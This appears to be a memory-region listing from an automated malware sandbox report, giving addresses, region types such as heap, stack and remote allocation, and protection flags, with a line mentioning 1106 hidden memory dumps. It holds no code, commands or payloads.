trusted library allocation
page read and write
D86000
heap
page read and write
1C22DBBB000
heap
page read and write
137994BB000
trusted library allocation
page read and write
5695000
heap
page read and write
5658000
heap
page read and write
38B1000
heap
page read and write
30BF000
stack
page read and write
1C22DBBB000
heap
page read and write
13797250000
trusted library allocation
page read and write
1F3B2DE0000
heap
page read and write
5693000
heap
page read and write
38A1000
heap
page read and write
D79000
heap
page read and write
38B8000
heap
page read and write
35C4000
heap
page read and write
38A0000
heap
page read and write
38AF000
heap
page read and write
878D000
stack
page read and write
6D0000
direct allocation
page read and write
740000
direct allocation
page read and write
13798D34000
trusted library allocation
page read and write
38B5000
heap
page read and write
D52000
heap
page read and write
22F71000
heap
page read and write
1C22F850000
heap
page read and write
8150000
trusted library allocation
page execute and read and write
29AE000
stack
page read and write
38B5000
heap
page read and write
7710000
trusted library allocation
page read and write
7020000
direct allocation
page read and write
7010000
direct allocation
page read and write
7FF886F71000
trusted library allocation
page read and write
9AAD000
direct allocation
page execute and read and write
13798CA0000
heap
page read and write
6BFE000
stack
page read and write
1BE000
stack
page read and write
C00000
heap
page read and write
2950000
heap
page read and write
7FF887050000
trusted library allocation
page read and write
D65000
heap
page read and write
56B6000
heap
page read and write
2F02000
trusted library allocation
page read and write
22810FE000
stack
page read and write
13797170000
heap
page read and write
1C22FAC4000
heap
page read and write
77AB000
stack
page read and write
22C9D000
heap
page read and write
1C22F852000
heap
page read and write
1C22DB54000
heap
page read and write
13797090000
heap
page read and write
38A8000
heap
page read and write
56B6000
heap
page read and write
4810000
trusted library allocation
page execute and read and write
5659000
heap
page read and write
4AF8000
heap
page read and write
8170000
trusted library allocation
page read and write
3044000
heap
page read and write
13797200000
trusted library allocation
page read and write
22100000
heap
page read and write
D84000
heap
page read and write
7FF887040000
trusted library allocation
page read and write
568A000
heap
page read and write
22118000
heap
page read and write
22DC3000
heap
page read and write
2287E000
stack
page read and write
1F3B2E00000
heap
page read and write
456000
system
page execute and read and write
3494000
heap
page read and write
D60000
heap
page read and write
D7D000
heap
page read and write
5659000
heap
page read and write
56B6000
heap
page read and write
72D2000
heap
page read and write
22CD0000
heap
page read and write
1C22DB54000
heap
page read and write
567B000
heap
page read and write
1C22F810000
heap
page read and write
6C3E000
stack
page read and write
B8AD000
direct allocation
page execute and read and write
1C22DBAE000
heap
page read and write
D60000
heap
page read and write
1C22FAAD000
heap
page read and write
D73000
heap
page read and write
59CD000
remote allocation
page execute and read and write
22670000
heap
page read and write
137A8D23000
trusted library allocation
page read and write
38AD000
heap
page read and write
BD0000
heap
page read and write
6E0000
direct allocation
page read and write
7FF8870B0000
trusted library allocation
page read and write
33A0000
heap
page read and write
38AC000
heap
page read and write
38A1000
heap
page read and write
137B10AD000
heap
page read and write
137994E0000
trusted library allocation
page read and write
670000
heap
page readonly
8290000
heap
page read and write
137970E1000
heap
page read and write
228228B000
stack
page read and write
38AD000
heap
page read and write
56B6000
heap
page read and write
3277000
stack
page read and write
D84000
heap
page read and write
1C22F836000
heap
page read and write
2258E000
stack
page read and write
7FF886DC0000
trusted library allocation
page read and write
8530000
heap
page read and write
32B0000
heap
page read and write
6E70000
direct allocation
page read and write
5EC000
heap
page read and write
76C0000
trusted library allocation
page read and write
323E000
stack
page read and write
225E0000
remote allocation
page read and write
38B8000
heap
page read and write
1379915C000
trusted library allocation
page read and write
38B1000
heap
page read and write
38A5000
heap
page read and write
A5B000
stack
page read and write
2E7C000
stack
page read and write
170000
heap
page read and write
D84000
heap
page read and write
2273E000
stack
page read and write
7760000
trusted library allocation
page read and write
2239F000
stack
page read and write
2EA0000
trusted library section
page read and write
4F31000
heap
page read and write
1C22DAF0000
heap
page read and write
2F30000
heap
page read and write
5675000
heap
page read and write
5680000
heap
page read and write
1C22DAF0000
heap
page read and write
5850000
trusted library allocation
page read and write
38B8000
heap
page read and write
1C22F823000
heap
page read and write
6B0000
direct allocation
page read and write
2280E7E000
stack
page read and write
22B21000
direct allocation
page execute and read and write
2EE9000
trusted library allocation
page read and write
73C0000
trusted library allocation
page read and write
5651000
heap
page read and write
56B6000
heap
page read and write
1379AA8C000
trusted library allocation
page read and write
5651000
heap
page read and write
398B000
heap
page read and write
7FF8870D0000
trusted library allocation
page read and write
BD000
stack
page read and write
821E000
stack
page read and write
13797305000
heap
page read and write
D8A000
heap
page read and write
7680000
trusted library allocation
page execute and read and write
13799178000
trusted library allocation
page read and write
D67000
heap
page read and write
C10000
heap
page read and write
33C0000
heap
page read and write
8220000
heap
page read and write
AEAD000
direct allocation
page execute and read and write
22C94000
heap
page read and write
75F01FB000
stack
page read and write
569D000
heap
page read and write
38B8000
heap
page read and write
730000
direct allocation
page read and write
4F8000
heap
page read and write
56B6000
heap
page read and write
3044000
heap
page read and write
6E90000
direct allocation
page read and write
3044000
heap
page read and write
1C22DB8B000
heap
page read and write
5680000
heap
page read and write
341E000
stack
page read and write
38B1000
heap
page read and write
1C22DB65000
heap
page read and write
2EEE000
stack
page read and write
35C0000
trusted library allocation
page read and write
D66000
heap
page read and write
56B6000
heap
page read and write
3044000
heap
page read and write
1C22DB81000
heap
page read and write
1C22DB6C000
heap
page read and write
73E9000
heap
page read and write
3494000
heap
page read and write
38AE000
heap
page read and write
137971A0000
heap
page read and write
400000
system
page execute and read and write
22811FE000
stack
page read and write
2F1A000
heap
page read and write
7FF887120000
trusted library allocation
page read and write
38B6000
heap
page read and write
226BC000
stack
page read and write
2344C000
unclassified section
page execute and read and write
34AF000
stack
page read and write
6D70000
heap
page execute and read and write
473000
system
page execute and read and write
1C22DB58000
heap
page read and write
38AD000
heap
page read and write
38BA000
heap
page read and write
38B8000
heap
page read and write
D47000
heap
page read and write
3148000
heap
page read and write
3044000
heap
page read and write
2FE0000
heap
page read and write
6FE0000
direct allocation
page read and write
E5E000
stack
page read and write
2349C000
stack
page read and write
D4B000
heap
page read and write
32FE000
stack
page read and write
4881000
trusted library allocation
page read and write
233E3000
unclassified section
page execute and read and write
38A9000
heap
page read and write
56B6000
heap
page read and write
D4A000
heap
page read and write
D87000
heap
page read and write
38B8000
heap
page read and write
D8C000
heap
page read and write
3293000
stack
page read and write
92E000
stack
page read and write
6A0000
direct allocation
page read and write
1C22F836000
heap
page read and write
1379AA88000
trusted library allocation
page read and write
220FE000
stack
page read and write
38A1000
heap
page read and write
137B12D3000
heap
page read and write
8EF000
unkown
page read and write
5675000
heap
page read and write
8870000
trusted library allocation
page execute and read and write
760000
direct allocation
page read and write
3989000
heap
page read and write
D7F000
heap
page read and write
1C22DB7D000
heap
page read and write
1C22DB65000
heap
page read and write
56B6000
heap
page read and write
4D0000
heap
page read and write
6D50000
direct allocation
page read and write
56B6000
heap
page read and write
74D3000
heap
page read and write
1C22DB5B000
heap
page read and write
567B000
heap
page read and write
5EC000
heap
page read and write
5891000
trusted library allocation
page read and write
1C22FA99000
heap
page read and write
22C92000
heap
page read and write
D62000
heap
page read and write
D5E000
heap
page read and write
98B000
heap
page read and write
45C000
system
page execute and read and write
BE0000
heap
page read and write
38A1000
heap
page read and write
8160000
trusted library allocation
page read and write
1C22DB73000
heap
page read and write
228153E000
stack
page read and write
233F0000
unclassified section
page execute and read and write
1C22DB5F000
heap
page read and write
398A000
heap
page read and write
2280F3E000
stack
page read and write
1C22F81C000
heap
page read and write
228BD000
stack
page read and write
75AE000
stack
page read and write
7FF886DC3000
trusted library allocation
page execute and read and write
137A8FAC000
trusted library allocation
page read and write
307E000
stack
page read and write
7050000
heap
page read and write
1379705B000
heap
page read and write
7530000
trusted library allocation
page read and write
38B8000
heap
page read and write
3680000
heap
page read and write
3494000
heap
page read and write
137B1326000
heap
page read and write
2ED0000
heap
page read and write
398A000
heap
page read and write
4760000
heap
page readonly
8140000
heap
page read and write
2DEE000
unkown
page read and write
1C22DB5F000
heap
page read and write
22C74000
heap
page read and write
C20000
heap
page read and write
398A000
heap
page read and write
1C22DB6C000
heap
page read and write
1C22DBA9000
heap
page read and write
32F0000
heap
page read and write
2960000
heap
page read and write
B40000
heap
page read and write
331E000
stack
page read and write
6FD0000
direct allocation
page read and write
394217D000
stack
page read and write
50AF000
stack
page read and write
1C22DB90000
heap
page read and write
36DE000
stack
page read and write
475F000
stack
page read and write
D6D000
heap
page read and write
2EFA000
trusted library allocation
page execute and read and write
2C3E000
stack
page read and write
7FF886E70000
trusted library allocation
page read and write
3494000
heap
page read and write
5658000
heap
page read and write
22450000
direct allocation
page read and write
75EF579000
stack
page read and write
D52000
heap
page read and write
D6B000
heap
page read and write
398B000
heap
page read and write
1C22DB5F000
heap
page read and write
13797096000
heap
page read and write
1C22DB09000
heap
page read and write
744F000
heap
page read and write
56B6000
heap
page read and write
5551000
heap
page read and write
1C22F82F000
heap
page read and write
7FF886DC2000
trusted library allocation
page read and write
5ABF000
heap
page read and write
6FF0000
direct allocation
page read and write
137B12B7000
heap
page read and write
854F000
heap
page read and write
1C22DB22000
heap
page read and write
228163E000
stack
page read and write
38B1000
heap
page read and write
346E000
stack
page read and write
38B8000
heap
page read and write
4F31000
heap
page read and write
5680000
heap
page read and write
8790000
trusted library allocation
page execute and read and write
7700000
trusted library allocation
page read and write
2283C000
stack
page read and write
38A9000
heap
page read and write
137B1270000
heap
page read and write
D8B000
heap
page read and write
4FCD000
remote allocation
page execute and read and write
81DD000
stack
page read and write
D82000
heap
page read and write
225E0000
remote allocation
page read and write
2261E000
stack
page read and write
7FF886FC0000
trusted library allocation
page read and write
BC0000
heap
page read and write
22C8D000
heap
page read and write
D80000
heap
page read and write
1C22DB70000
heap
page read and write
22EDB000
heap
page read and write
A4AD000
direct allocation
page execute and read and write
5556000
heap
page read and write
1379709C000
heap
page read and write
3240000
heap
page read and write
76D0000
trusted library allocation
page read and write
7FF887070000
trusted library allocation
page read and write
13798BE0000
heap
page execute and read and write
1C22FA95000
heap
page read and write
22C7E000
heap
page read and write
22C45000
heap
page read and write
137B12D5000
heap
page read and write
471E000
stack
page read and write
1F3B2FF0000
heap
page read and write
72BF000
stack
page read and write
D91000
heap
page read and write
56B6000
heap
page read and write
3494000
heap
page read and write
D94000
heap
page read and write
38AB000
heap
page read and write
7FF887090000
trusted library allocation
page read and write
3044000
heap
page read and write
1C22F81C000
heap
page read and write
22E6A000
heap
page read and write
567B000
heap
page read and write
D7D000
heap
page read and write
2F00000
heap
page read and write
2FCF000
stack
page read and write
5656000
heap
page read and write
5850000
trusted library allocation
page read and write
7FF886F60000
trusted library allocation
page read and write
5850000
heap
page read and write
1C22DB93000
heap
page read and write
13799168000
trusted library allocation
page read and write
56B6000
heap
page read and write
1C22DB93000
heap
page read and write
4FDC000
trusted library allocation
page read and write
750000
direct allocation
page read and write
D94000
heap
page read and write
62E000
stack
page read and write
1C22DA95000
heap
page read and write
762E000
stack
page read and write
5675000
heap
page read and write
D6B000
heap
page read and write
137970DB000
heap
page read and write
325C000
stack
page read and write
1F3B2E20000
heap
page read and write
7FF886EE0000
trusted library allocation
page execute and read and write
1C22DB86000
heap
page read and write
565F000
heap
page read and write
38A9000
heap
page read and write
3044000
heap
page read and write
38B5000
heap
page read and write
13798ACD000
heap
page read and write
5D2000
heap
page read and write
137B1500000
heap
page read and write
22BC1000
heap
page read and write
3490000
heap
page read and write
1C22DB93000
heap
page read and write
22A7D000
stack
page read and write
398A000
heap
page read and write
23370000
unclassified section
page execute and read and write
289C000
stack
page read and write
1C22DB8E000
heap
page read and write
2EA0000
heap
page read and write
D67000
heap
page read and write
D75000
heap
page read and write
1C22DAC0000
heap
page read and write
5551000
heap
page read and write
38A0000
heap
page read and write
7FF886FB0000
trusted library allocation
page execute and read and write
7F7B0000
trusted library allocation
page execute and read and write
4820000
heap
page execute and read and write
38AF000
heap
page read and write
13797315000
heap
page read and write
22470000
direct allocation
page read and write
5658000
heap
page read and write
7DF45D9D0000
trusted library allocation
page execute and read and write
2D3A000
heap
page read and write
400000
system
page execute and read and write
7FF8870C0000
trusted library allocation
page read and write
1C22DA99000
heap
page read and write
2F1F000
heap
page read and write
720000
direct allocation
page read and write
13799166000
trusted library allocation
page read and write
2F58000
heap
page read and write
8355000
trusted library allocation
page read and write
22440000
direct allocation
page read and write
1C22F853000
heap
page read and write
569D000
heap
page read and write
2280BC3000
stack
page read and write
D8F000
heap
page read and write
56B6000
heap
page read and write
D41000
heap
page read and write
459000
system
page execute and read and write
33C0000
heap
page read and write
30EC000
heap
page read and write
38B5000
heap
page read and write
22C92000
heap
page read and write
7FF886DDC000
trusted library allocation
page read and write
325F000
stack
page read and write
1379937A000
trusted library allocation
page read and write
766D000
stack
page read and write
3044000
heap
page read and write
56B6000
heap
page read and write
52FF000
stack
page read and write
D28000
heap
page read and write
565C000
heap
page read and write
8510000
heap
page read and write
224FF000
stack
page read and write
75EFCFE000
stack
page read and write
3494000
heap
page read and write
3494000
heap
page read and write
850C000
stack
page read and write
38B5000
heap
page read and write
22F71000
heap
page read and write
1FE000
stack
page read and write
1C22DB5F000
heap
page read and write
1C22FA98000
heap
page read and write
1C22DAEC000
heap
page read and write
398A000
heap
page read and write
3713000
heap
page read and write
35CF000
heap
page read and write
1C22DBA9000
heap
page read and write
87D0000
trusted library allocation
page read and write
38A1000
heap
page read and write
398A000
heap
page read and write
38A0000
heap
page read and write
22C94000
heap
page read and write
38B5000
heap
page read and write
56B6000
heap
page read and write
47CC000
stack
page read and write
45D000
system
page execute and read and write
3044000
heap
page read and write
1C22F816000
heap
page read and write
5B32000
trusted library allocation
page read and write
398E000
heap
page read and write
48DF000
trusted library allocation
page read and write
D5E000
heap
page read and write
4FAE000
stack
page read and write
13797300000
heap
page read and write
7FF886E7C000
trusted library allocation
page execute and read and write
1C22DB59000
heap
page read and write
1C22FA94000
heap
page read and write
56B6000
heap
page read and write
2E70000
heap
page read and write
700000
direct allocation
page read and write
38B8000
heap
page read and write
2F56000
heap
page read and write
13797310000
heap
page read and write
38AF000
heap
page read and write
2D54000
heap
page read and write
13798ED5000
trusted library allocation
page read and write
13799174000
trusted library allocation
page read and write
1C22F836000
heap
page read and write
2EC0000
trusted library allocation
page read and write
D70000
heap
page read and write
7E0000
heap
page read and write
5D6000
heap
page read and write
828D000
trusted library allocation
page read and write
6D70000
heap
page read and write
1379AC01000
trusted library allocation
page read and write
13796F60000
heap
page read and write
7FF8870A0000
trusted library allocation
page read and write
5B2C000
trusted library allocation
page read and write
22460000
direct allocation
page read and write
5658000
heap
page read and write
3104000
heap
page read and write
1C22F836000
heap
page read and write
5550000
heap
page read and write
D77000
heap
page read and write
2F3C000
stack
page read and write
3102000
heap
page read and write
228208E000
stack
page read and write
8557000
heap
page read and write
1379709E000
heap
page read and write
1C22F836000
heap
page read and write
22B0B000
unclassified section
page execute and read and write
1C22DBAF000
heap
page read and write
38A0000
heap
page read and write
7FF886E80000
trusted library allocation
page execute and read and write
38B5000
heap
page read and write
6EC0000
direct allocation
page read and write
1C22DBBB000
heap
page read and write
35B0000
trusted library allocation
page read and write
1C22DB45000
heap
page read and write
38B5000
heap
page read and write
4F30000
heap
page read and write
5EB000
heap
page read and write
3A80000
remote allocation
page execute and read and write
38A1000
heap
page read and write
56B6000
heap
page read and write
1C22DBBB000
heap
page read and write
73C8000
trusted library allocation
page read and write
22816BB000
stack
page read and write
2280EBF000
unkown
page read and write
5669000
heap
page read and write
1C22DB90000
heap
page read and write
3494000
heap
page read and write
398A000
heap
page read and write
38A1000
heap
page read and write
13799519000
trusted library allocation
page read and write
7FF887130000
trusted library allocation
page read and write
56B6000
heap
page read and write
1C22DA9D000
heap
page read and write
75EF8FE000
stack
page read and write
1C22DBAF000
heap
page read and write
D72000
heap
page read and write
3710000
heap
page read and write
1C22DB35000
heap
page read and write
38B0000
heap
page read and write
D64000
heap
page read and write
137993F6000
trusted library allocation
page read and write
7090000
heap
page read and write
8553000
heap
page read and write
B5B000
stack
page read and write
38A1000
heap
page read and write
1C22DAFF000
heap
page read and write
567C000
heap
page read and write
1C22F827000
heap
page read and write
1C22DB65000
heap
page read and write
3044000
heap
page read and write
74E0000
trusted library allocation
page read and write
32CC000
heap
page read and write
1F3B2E2B000
heap
page read and write
7540000
trusted library allocation
page read and write
4FC4000
trusted library allocation
page read and write
1C22DB09000
heap
page read and write
137B1008000
heap
page read and write
D84000
heap
page read and write
2254E000
stack
page read and write
137A8F9D000
trusted library allocation
page read and write
30CF000
stack
page read and write
6CBF000
stack
page read and write
2E3D000
stack
page read and write
1C22DBBB000
heap
page read and write
1C22DB5D000
heap
page read and write
137B10D4000
heap
page read and write
3020000
heap
page read and write
585A000
heap
page read and write
847B000
stack
page read and write
D5E000
heap
page read and write
4E5E000
stack
page read and write
567E000
heap
page read and write
2CA0000
heap
page read and write
1C22DB6B000
heap
page read and write
7FF886DD0000
trusted library allocation
page read and write
1C22DB5F000
heap
page read and write
56B6000
heap
page read and write
1379AA2E000
trusted library allocation
page read and write
22FA5000
heap
page read and write
D52000
heap
page read and write
6F0000
direct allocation
page read and write
D71000
heap
page read and write
1379AAC1000
trusted library allocation
page read and write
D63000
heap
page read and write
2EC3000
trusted library allocation
page execute and read and write
2EB0000
trusted library allocation
page read and write
56B6000
heap
page read and write
1C22DB45000
heap
page read and write
82E0000
trusted library allocation
page read and write
58E9000
trusted library allocation
page read and write
6EA0000
direct allocation
page read and write
22C9D000
heap
page read and write
328F000
stack
page read and write
2280FFF000
stack
page read and write
51A000
heap
page read and write
1C22DAEB000
heap
page read and write
1C22F815000
heap
page read and write
1C22F81D000
heap
page read and write
7FF887080000
trusted library allocation
page read and write
D8B000
heap
page read and write
1C22DB90000
heap
page read and write
13797150000
heap
page read and write
7000000
direct allocation
page read and write
56B6000
heap
page read and write
2277F000
stack
page read and write
1C22DA98000
heap
page read and write
1C22DA10000
heap
page read and write
1C22DB5A000
heap
page read and write
5661000
heap
page read and write
3495000
heap
page read and write
C4F000
stack
page read and write
680000
direct allocation
page read and write
29F0000
heap
page read and write
7560000
heap
page execute and read and write
D6E000
heap
page read and write
39425FE000
stack
page read and write
38B8000
heap
page read and write
63CD000
remote allocation
page execute and read and write
3105000
heap
page read and write
565F000
heap
page read and write
22B36000
direct allocation
page execute and read and write
398B000
heap
page read and write
38B1000
heap
page read and write
7FF886DCD000
trusted library allocation
page execute and read and write
1C22DBA7000
heap
page read and write
8230000
trusted library allocation
page execute and read and write
56B6000
heap
page read and write
38D7000
heap
page read and write
3494000
heap
page read and write
137994EE000
trusted library allocation
page read and write
87B0000
trusted library allocation
page read and write
56B6000
heap
page read and write
1379A562000
trusted library allocation
page read and write
22C45000
heap
page read and write
D60000
heap
page read and write
6FD000
stack
page read and write
5658000
heap
page read and write
1C22DA98000
heap
page read and write
1C22F81C000
heap
page read and write
56B6000
heap
page read and write
1C22DB5F000
heap
page read and write
22E9B000
heap
page read and write
38AB000
heap
page read and write
327C000
stack
page read and write
1F3B2DB0000
heap
page read and write
5850000
trusted library allocation
page read and write
D7F000
heap
page read and write
1C22DA9B000
heap
page read and write
3495000
heap
page read and write
3495000
heap
page read and write
D50000
heap
page read and write
E70000
heap
page read and write
75F02FF000
stack
page read and write
32B8000
heap
page read and write
130000
heap
page read and write
13797094000
heap
page read and write
D6A000
heap
page read and write
13799330000
trusted library allocation
page read and write
1C22DAFE000
heap
page read and write
D90000
heap
page read and write
3495000
heap
page read and write
7FF887000000
trusted library allocation
page read and write
565C000
heap
page read and write
1C22F836000
heap
page read and write
2CDC000
heap
page read and write
D6A000
heap
page read and write
2F60000
heap
page read and write
5661000
heap
page read and write
13797050000
heap
page read and write
7FF886F80000
trusted library allocation
page execute and read and write
137B0FFD000
heap
page read and write
6E4C000
stack
page read and write
480E000
stack
page read and write
22B20000
direct allocation
page read and write
5669000
heap
page read and write
22C44000
heap
page read and write
6E60000
direct allocation
page read and write
3044000
heap
page read and write
227FE000
stack
page read and write
6C7E000
stack
page read and write
5998000
heap
page read and write
38A8000
heap
page read and write
56B6000
heap
page read and write
3494000
heap
page read and write
35B0000
heap
page read and write
1F3B2DD5000
heap
page read and write
1C22DBAF000
heap
page read and write
2EF0000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
38B8000
heap
page read and write
599D000
heap
page read and write
220BE000
stack
page read and write
1379AAB0000
trusted library allocation
page read and write
1C22DB5A000
heap
page read and write
75EFDFE000
stack
page read and write
228220A000
stack
page read and write
D6D000
heap
page read and write
6E0D000
stack
page read and write
38B8000
heap
page read and write
D71000
heap
page read and write
D88000
heap
page read and write
13799510000
trusted library allocation
page read and write
13797290000
trusted library allocation
page read and write
7FF886EA6000
trusted library allocation
page execute and read and write
1C22F836000
heap
page read and write
1C22F811000
heap
page read and write
D75000
heap
page read and write
38AF000
heap
page read and write
1C22F81C000
heap
page read and write
1C22F836000
heap
page read and write
137B1190000
heap
page read and write
13797146000
heap
page read and write
770000
direct allocation
page read and write
22C9E000
heap
page read and write
D38000
heap
page read and write
3044000
heap
page read and write
137A8CC0000
trusted library allocation
page read and write
228218D000
stack
page read and write
1C22FA90000
heap
page read and write
228117E000
stack
page read and write
359F000
stack
page read and write
22C8D000
heap
page read and write
2F1A000
heap
page read and write
4870000
heap
page read and write
2EE0000
trusted library allocation
page read and write
5658000
heap
page read and write
5651000
heap
page read and write
D83000
heap
page read and write
8F60000
direct allocation
page execute and read and write
D60000
heap
page read and write
38B8000
heap
page read and write
228FE000
stack
page read and write
38B8000
heap
page read and write
1C22DB67000
heap
page read and write
359F000
stack
page read and write
228107D000
stack
page read and write
22ABE000
stack
page read and write
7FF887100000
trusted library allocation
page read and write
6DC0000
heap
page read and write
2F56000
heap
page read and write
2FF0000
heap
page readonly
7FF887020000
trusted library allocation
page read and write
1C22DB6E000
heap
page read and write
3980000
heap
page read and write
6E87000
heap
page read and write
38B1000
heap
page read and write
6CFE000
stack
page read and write
22BC1000
heap
page read and write
22BC0000
heap
page read and write
5675000
heap
page read and write
8541000
heap
page read and write
233CD000
unclassified section
page execute and read and write
45CD000
remote allocation
page execute and read and write
32D000
stack
page read and write
D40000
heap
page read and write
226FC000
stack
page read and write
38BA000
heap
page read and write
3494000
heap
page read and write
7720000
trusted library allocation
page read and write
13798CB1000
trusted library allocation
page read and write
23446000
unclassified section
page execute and read and write
3494000
heap
page read and write
390000
heap
page read and write
1C22F836000
heap
page read and write
38BA000
heap
page read and write
76B0000
trusted library allocation
page read and write
1C22DBBB000
heap
page read and write
D47000
heap
page read and write
5657000
heap
page read and write
315E000
stack
page read and write
567B000
heap
page read and write
5BD3000
heap
page read and write
3494000
heap
page read and write
8512000
heap
page read and write
5680000
heap
page read and write
1C22DB45000
heap
page read and write
1C22F81B000
heap
page read and write
38BA000
heap
page read and write
75EE000
stack
page read and write
567D000
heap
page read and write
7FF886E76000
trusted library allocation
page read and write
22E9B000
heap
page read and write
7FF887110000
trusted library allocation
page read and write
1C22DB54000
heap
page read and write
38B5000
heap
page read and write
33D0000
heap
page readonly
38B5000
heap
page read and write
5680000
heap
page read and write
5656000
heap
page read and write
5A9B000
heap
page read and write
5988000
heap
page read and write
13799F19000
trusted library allocation
page read and write
D38000
heap
page read and write
387E000
stack
page read and write
843C000
stack
page read and write
38B8000
heap
page read and write
558000
heap
page read and write
3494000
heap
page read and write
7FF886FD0000
trusted library allocation
page read and write
3495000
heap
page read and write
13799500000
trusted library allocation
page read and write
2CAB000
heap
page read and write
38B8000
heap
page read and write
3420000
heap
page read and write
3044000
heap
page read and write
38B5000
heap
page read and write
38B5000
heap
page read and write
2E90000
trusted library section
page read and write
38B8000
heap
page read and write
3E0000
heap
page read and write
56B6000
heap
page read and write
1C22DB90000
heap
page read and write
2265F000
stack
page read and write
56D000
heap
page read and write
1C22DB54000
heap
page read and write
38A9000
heap
page read and write
D20000
heap
page read and write
B9D000
stack
page read and write
5658000
heap
page read and write
1C22DA99000
heap
page read and write
38B8000
heap
page read and write
D84000
heap
page read and write
28D8000
stack
page read and write
7FF887030000
trusted library allocation
page read and write
3030000
heap
page readonly
1C22DB45000
heap
page read and write
1C22DB93000
heap
page read and write
2EBA000
stack
page read and write
1C22D910000
heap
page read and write
38A1000
heap
page read and write
1C22DBAF000
heap
page read and write
5658000
heap
page read and write
FE000
stack
page read and write
D6C000
heap
page read and write
137B133C000
heap
page read and write
512F000
stack
page read and write
1C22F81E000
heap
page read and write
1C22DB74000
heap
page read and write
38B8000
heap
page read and write
137B1160000
heap
page execute and read and write
4778000
trusted library allocation
page read and write
58A9000
trusted library allocation
page read and write
38B1000
heap
page read and write
225E0000
remote allocation
page read and write
1C22DB93000
heap
page read and write
5659000
heap
page read and write
2C7E000
stack
page read and write
7740000
trusted library allocation
page read and write
7FF8870E0000
trusted library allocation
page read and write
87E0000
trusted library allocation
page read and write
D80000
heap
page read and write
1C22DAFC000
heap
page read and write
49D5000
trusted library allocation
page read and write
2D05000
heap
page read and write
7FF886DC4000
trusted library allocation
page read and write
2ECD000
trusted library allocation
page execute and read and write
8584000
heap
page read and write
6E50000
direct allocation
page read and write
4830000
trusted library allocation
page read and write
38AD000
heap
page read and write
D88000
heap
page read and write
13797220000
trusted library allocation
page read and write
22BBC000
stack
page read and write
7FF886F7A000
trusted library allocation
page read and write
1C22F4C0000
heap
page read and write
5651000
heap
page read and write
1C22F813000
heap
page read and write
38B8000
heap
page read and write
CFE000
stack
page read and write
73E0000
heap
page read and write
5881000
trusted library allocation
page read and write
2D13000
heap
page read and write
32DF000
unkown
page read and write
228210E000
stack
page read and write
1C22DB5A000
heap
page read and write
22C39000
heap
page read and write
D75000
heap
page read and write
75EFBFF000
stack
page read and write
1C22DB35000
heap
page read and write
7550000
trusted library allocation
page read and write
137B1048000
heap
page read and write
82C0000
trusted library allocation
page read and write
75EFFFE000
stack
page read and write
22CD1000
heap
page read and write
There are 1106 hidden memdumps, click here to show them.